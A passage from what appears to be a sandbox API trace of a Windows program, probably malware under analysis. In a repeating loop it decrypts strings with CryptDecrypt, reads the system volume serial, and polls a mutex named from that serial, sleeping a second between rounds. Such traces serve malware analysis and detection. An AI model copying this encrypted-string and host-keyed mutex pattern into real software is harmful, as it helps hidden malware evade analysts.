pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0132.738] CryptDestroyKey (hKey=0x29c020) returned 1 [0132.738] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0132.738] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0132.738] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0132.738] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0132.738] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0132.738] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0132.738] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0132.738] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0132.738] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0132.738] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0132.738] CryptDestroyKey (hKey=0x29c020) returned 1 [0132.738] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0132.738] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x250 [0132.738] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0x0) returned 0x102 [0132.738] CloseHandle (hObject=0x250) returned 1 [0132.738] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0132.738] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0132.738] Sleep (dwMilliseconds=0x3e8) [0133.747] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0133.747] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0133.747] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0133.747] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0133.747] CryptDestroyKey (hKey=0x29c020) returned 1 [0133.747] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0133.747] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0133.747] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0133.747] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0133.747] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0133.747] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0133.747] CryptDestroyKey (hKey=0x29c020) returned 1 [0133.747] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0133.747] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0133.747] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0133.747] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0133.747] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0133.748] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0133.748] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0133.748] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0133.748] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0133.748] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0133.748] CryptDestroyKey (hKey=0x29c020) returned 1 [0133.748] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0133.748] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x250 [0133.748] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0x0) returned 0x102 [0133.748] CloseHandle (hObject=0x250) returned 1 [0133.748] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0133.748] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0133.748] Sleep (dwMilliseconds=0x3e8) [0135.244] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0135.244] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0135.244] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0135.244] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0135.244] CryptDestroyKey (hKey=0x29c020) returned 1 [0135.244] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0135.244] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0135.244] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0135.244] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0135.245] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0135.245] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0135.245] CryptDestroyKey (hKey=0x29c020) returned 1 [0135.245] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0135.245] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0135.245] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0135.245] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0135.245] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0135.245] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0135.245] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0135.245] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0135.245] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0135.245] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0135.245] CryptDestroyKey (hKey=0x29c020) returned 1 [0135.245] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0135.245] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x250 [0135.245] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0x0) returned 0x102 [0135.245] CloseHandle (hObject=0x250) returned 1 [0135.245] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0135.245] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0135.245] Sleep (dwMilliseconds=0x3e8) [0136.258] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0136.258] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0136.258] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0136.258] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0136.258] CryptDestroyKey (hKey=0x29c020) returned 1 [0136.258] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0136.258] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0136.258] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0136.258] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0136.258] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0136.258] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0136.258] CryptDestroyKey (hKey=0x29c020) returned 1 [0136.259] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0136.259] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0136.259] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0136.259] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0136.259] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0136.259] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0136.259] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0136.259] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0136.259] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0136.259] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0136.259] CryptDestroyKey (hKey=0x29c020) returned 1 [0136.259] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0136.259] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x250 [0136.259] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0x0) returned 0x102 [0136.259] CloseHandle (hObject=0x250) returned 1 [0136.259] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0136.259] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0136.259] Sleep (dwMilliseconds=0x3e8) [0137.305] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0137.305] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0137.306] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0137.306] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0137.306] CryptDestroyKey (hKey=0x29c020) returned 1 [0137.306] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0137.306] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0137.306] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0137.306] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0137.306] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0137.306] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0137.306] CryptDestroyKey (hKey=0x29c020) returned 1 [0137.306] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0137.306] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0137.306] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0137.306] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0137.306] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0137.306] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0137.306] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0137.306] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0137.306] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0137.306] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0137.306] CryptDestroyKey (hKey=0x29c020) returned 1 [0137.306] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0137.306] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x250 [0137.307] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0x0) returned 0x102 [0137.307] CloseHandle (hObject=0x250) returned 1 [0137.307] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0137.307] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0137.307] Sleep (dwMilliseconds=0x3e8) [0138.559] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0138.559] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0138.559] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0138.559] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0138.559] CryptDestroyKey (hKey=0x29c020) returned 1 [0138.559] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0138.559] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0138.559] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0138.559] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0138.559] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0138.560] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0138.560] CryptDestroyKey (hKey=0x29c020) returned 1 [0138.560] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0138.560] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0138.560] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0138.560] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0138.560] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0138.560] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0138.560] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0138.560] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0138.560] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0138.560] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0138.560] CryptDestroyKey (hKey=0x29c020) returned 1 [0138.560] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0138.560] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x250 [0138.560] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0x0) returned 0x102 [0138.560] CloseHandle (hObject=0x250) returned 1 [0138.560] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0138.560] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0138.560] Sleep (dwMilliseconds=0x3e8) [0139.569] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0139.569] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0139.569] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0139.570] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0139.570] CryptDestroyKey (hKey=0x29c020) returned 1 [0139.570] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0139.570] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0139.570] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0139.570] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0139.570] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0139.570] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0139.570] CryptDestroyKey (hKey=0x29c020) returned 1 [0139.570] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0139.570] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0139.570] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0139.570] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0139.570] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0139.570] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0139.570] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0139.570] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0139.570] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0139.570] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0139.570] CryptDestroyKey (hKey=0x29c020) returned 1 [0139.570] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0139.570] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x250 [0139.570] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0x0) returned 0x102 [0139.570] CloseHandle (hObject=0x250) returned 1 [0139.570] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0139.570] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0139.570] Sleep (dwMilliseconds=0x3e8) [0140.581] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0140.581] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0140.581] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0140.581] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0140.581] CryptDestroyKey (hKey=0x29c020) returned 1 [0140.581] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0140.581] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0140.581] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0140.581] CryptImportKey 